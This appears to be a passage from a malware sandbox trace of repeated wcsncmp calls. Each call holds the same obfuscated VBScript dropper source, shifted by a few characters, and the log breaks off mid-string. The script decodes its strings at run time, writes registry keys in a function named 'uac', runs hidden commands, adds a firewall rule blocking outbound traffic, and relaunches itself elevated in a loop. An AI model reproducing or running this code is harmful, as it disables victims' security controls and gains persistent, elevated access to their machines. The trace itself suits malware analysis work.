bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0222.997] wcsncmp (_String1="olicy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.997] wcsncmp (_String1="licy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0222.997] wcsncmp (_String1="icy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.997] wcsncmp (_String1="cy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.997] wcsncmp (_String1="y.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove 